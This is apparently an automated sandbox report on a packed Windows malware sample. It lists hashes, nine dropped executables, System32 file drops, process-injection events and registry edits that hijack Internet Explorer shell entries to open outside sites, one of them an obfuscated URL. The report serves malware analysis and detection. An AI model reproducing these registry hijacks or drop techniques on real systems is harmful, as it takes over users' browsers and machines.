Analysis
-
max time kernel
142s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 09:08
Static task
static1
Behavioral task
behavioral1
Sample
6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
-
Size
543KB
-
MD5
6e1552e43e9973359bc48ad13cc23e75
-
SHA1
b1e6284d6ce6f002feb55e02bac70146a335496c
-
SHA256
321206bd7a96f72a34cdcd2b018e4d6978287017efc60ec254715dda7befe181
-
SHA512
08cc286ef8c93d48ac1c465487d37701d9fedc520026b92e98a2e3b070dec4976d232d15cf967f57e947b932bfa3312f5b6717a36e4935991afb4e0a49eaffb8
-
SSDEEP
12288:pgnJX2//HNYbQ54qt4Hag1qBOVs/72IBZwjc5Vp8wJhaz/2DmFtmgNyEqTbN:OnJGHHJmHagYBOiDJwjtwJo4mFUrp
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe5.exeie.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 5.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation ie.exe -
Executes dropped EXE 9 IoCs
Processes:
5.exeie.exe146.exeq1222211.exesi.exeTAEKMAN.exezm.exetj.exeSource.exepid process 4264 5.exe 1924 ie.exe 3128 146.exe 3932 q1222211.exe 3208 si.exe 1052 TAEKMAN.exe 4728 zm.exe 3628 tj.exe 1060 Source.exe -
Processes:
resource yara_rule behavioral2/memory/1060-112-0x0000000000400000-0x0000000000432000-memory.dmp vmprotect C:\Windows\temp\syccom\Source.exe vmprotect behavioral2/memory/1060-115-0x0000000000400000-0x0000000000432000-memory.dmp vmprotect behavioral2/memory/1060-134-0x0000000000400000-0x0000000000432000-memory.dmp vmprotect -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 2 IoCs
Processes:
146.exedescription ioc process File opened for modification C:\Windows\SysWOW64\appmgmts.dll 146.exe File created C:\Windows\SysWOW64\qmgr.dll 146.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\146.exe upx C:\Users\Admin\AppData\Local\Temp\si.exe upx behavioral2/memory/3208-73-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/3208-132-0x0000000000400000-0x000000000041F000-memory.dmp upx -
Drops file in Windows directory 4 IoCs
Processes:
ie.exezm.exedescription ioc process File created C:\Windows\regedit.ico ie.exe File created C:\Windows\TAEKMAN.exe ie.exe File opened for modification \??\c:\windows\cy.ico zm.exe File opened for modification \??\c:\windows\taobao.ico zm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exe146.exezm.exeIEXPLORE.EXEq1222211.exePING.EXE6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exeie.exesi.exe5.exeSource.execmd.exeTAEKMAN.exetj.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 146.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language q1222211.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ie.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language si.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Source.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TAEKMAN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 4896 cmd.exe 2428 PING.EXE -
Processes:
IEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1036993923" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "436439502" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31139115" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1036993923" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31139115" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1035275599" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013f787289f1be14e87be8dc204ff715d00000000020000000000106600000001000020000000e362b664363c32a6b95a2d4d1a3b5f0ccfce52cbf7c79b7ce302b7cd6ecc697e000000000e80000000020000200000001f18f6c059665cc7eb3ae042db1b83bd4a7b2abfebcb30ad3cce4be8adca970a20000000fff2dae07c1ca51b2556bd491397a59572011eddfd1df1dea1eb3a49899e1fb840000000a654a2d4ff72800cd94957756a8256e2ad03cb7a200af197896082df3c0780f756424d9a7eae854be30683a34c315e0ba525da4110087ad1c09c35ccb606ffab IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 001f573e2b25db01 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013f787289f1be14e87be8dc204ff715d0000000002000000000010660000000100002000000058b3105de73c1b63b94686580dd9d394bdde55235d2ceb36215e6d45a1cb4b5f000000000e8000000002000020000000b7ad1407b53a34eda6231f59dd23a636d972ec6ac60cb99b157fa0e8fd7b5860200000003d0d2f1860fe9ca60020dd0cb93fe6ccbd7a23306a579dbca23d8fda2f656bd84000000023ae701cfaa5bd5638bb3d32fbe1354c452444abe5d644e7e8ed38f0b6da15d43dfa3a17d09319a5995f8cec8c7b60a85a5b6279626339d630b66b49e5669e7e IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1035275599" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e005633e2b25db01 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31139115" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31139115" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{692A206C-911E-11EF-B319-E26222BAF6A3} = "0" IEXPLORE.EXE -
Modifies registry class 64 IoCs
Processes:
ie.exezm.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\ShellFolder\Attributes = "10" ie.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DefaultIcon ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Shell ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\Open zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\??(R) zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\DefaultIcon ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\ÊôÐÔ(&D)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O)\Command\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE %1 h%t%t%p:%//%w%w%w.l%el%e%14%14%14.%c%o%m" ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ = "Internet Explorer" zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\LocalizedString = "@C:\\WINDOWS\\system32\\zh-CN\\\\ieframe.dll.mui,-880" zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\ShellFolder ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284} zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\HideAsDeletePerUser zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0} ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DefaultIcon\ = "C:\\Windows\\regedit.ico" ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\DefaultIcon zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R)\ zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ = "Internet Explorer" zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\LocalizedString = "@C:\\WINDOWS\\system32\\zh-CN\\ieframe.dll.mui,-880" zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\Open\ = "????(H)" zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\ = "Internet Explorer" ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O)\ = "Open(&O)" ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShellFolder ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R)\Command zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\ÊôÐÔ(&D) ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\ÊôÐÔ(&D)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R) zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder\HideFolderVerbs zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D6872828} zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\??(R)\Command zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\??(R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\ = "C:\\WINDOWS\\SysWow64\\ieframe.dll,-190" zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open\Command\ = "C:\\Program Files\\Internet Explorer\\iexplore.exe http://2.gequ.la" zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder\WantsParseDisplayName zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\ = "??" zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O)\Command ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\Open(&O)\Command\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE " ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder\ zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\DefaultIcon zm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\Attributes = "10" zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\ÊôÐÔ(&D) ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\ÊôÐÔ(&D)\Command ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open\ = "????(H)" zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder\ = "C:\\WINDOWS\\SysWow64\\ieframe.dll,-190" zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\HideFolderVerbs zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\ÊôÐÔ(&D)\Command ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O) ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\Open(&O)\Command ie.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\Open(&O) ie.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\ = "Open" zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\Open\Command zm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\DefaultIcon\ = "c:\\windows\\cy.ico" zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open\Command zm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D6872828}\ShellFolder zm.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
IEXPLORE.EXEpid process 4984 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
si.exeq1222211.exeTAEKMAN.exezm.exetj.exeSource.exeIEXPLORE.EXEIEXPLORE.EXEpid process 3208 si.exe 3932 q1222211.exe 1052 TAEKMAN.exe 4728 zm.exe 3628 tj.exe 1060 Source.exe 4984 IEXPLORE.EXE 4984 IEXPLORE.EXE 1336 IEXPLORE.EXE 1336 IEXPLORE.EXE 1336 IEXPLORE.EXE 1336 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe5.exeie.exeq1222211.exezm.exetj.exeIEXPLORE.EXEcmd.exedescription pid process target process PID 3048 wrote to memory of 4264 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 5.exe PID 3048 wrote to memory of 4264 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 5.exe PID 3048 wrote to memory of 4264 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 5.exe PID 3048 wrote to memory of 1924 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe ie.exe PID 3048 wrote to memory of 1924 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe ie.exe PID 3048 wrote to memory of 1924 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe ie.exe PID 3048 wrote to memory of 3128 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 146.exe PID 3048 wrote to memory of 3128 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 146.exe PID 3048 wrote to memory of 3128 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe 146.exe PID 4264 wrote to memory of 3932 4264 5.exe q1222211.exe PID 4264 wrote to memory of 3932 4264 5.exe q1222211.exe PID 4264 wrote to memory of 3932 4264 5.exe q1222211.exe PID 3048 wrote to memory of 3208 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe si.exe PID 3048 wrote to memory of 3208 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe si.exe PID 3048 wrote to memory of 3208 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe si.exe PID 1924 wrote to memory of 1052 1924 ie.exe TAEKMAN.exe PID 1924 wrote to memory of 1052 1924 ie.exe TAEKMAN.exe PID 1924 wrote to memory of 1052 1924 ie.exe TAEKMAN.exe PID 3048 wrote to memory of 4728 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe zm.exe PID 3048 wrote to memory of 4728 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe zm.exe PID 3048 wrote to memory of 4728 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe zm.exe PID 3048 wrote to memory of 3628 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe tj.exe PID 3048 wrote to memory of 3628 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe tj.exe PID 3048 wrote to memory of 3628 3048 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe tj.exe PID 3932 wrote to memory of 1060 3932 q1222211.exe Source.exe PID 3932 wrote to memory of 1060 3932 q1222211.exe Source.exe PID 3932 wrote to memory of 1060 3932 q1222211.exe Source.exe PID 1924 wrote to memory of 3200 1924 ie.exe cmd.exe PID 1924 wrote to memory of 3200 1924 ie.exe cmd.exe PID 1924 wrote to memory of 3200 1924 ie.exe cmd.exe PID 4728 wrote to memory of 2608 4728 zm.exe cmd.exe PID 4728 wrote to memory of 2608 4728 zm.exe cmd.exe PID 4728 wrote to memory of 2608 4728 zm.exe cmd.exe PID 3628 wrote to memory of 4984 3628 tj.exe IEXPLORE.EXE PID 3628 wrote to memory of 4984 3628 tj.exe IEXPLORE.EXE PID 4984 wrote to memory of 1336 4984 IEXPLORE.EXE IEXPLORE.EXE PID 4984 wrote to memory of 1336 4984 IEXPLORE.EXE IEXPLORE.EXE PID 4984 wrote to memory of 1336 4984 IEXPLORE.EXE IEXPLORE.EXE PID 3628 wrote to memory of 4896 3628 tj.exe cmd.exe PID 3628 wrote to memory of 4896 3628 tj.exe cmd.exe PID 3628 wrote to memory of 4896 3628 tj.exe cmd.exe PID 4896 wrote to memory of 2428 4896 cmd.exe PING.EXE PID 4896 wrote to memory of 2428 4896 cmd.exe PING.EXE PID 4896 wrote to memory of 2428 4896 cmd.exe PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3048 -
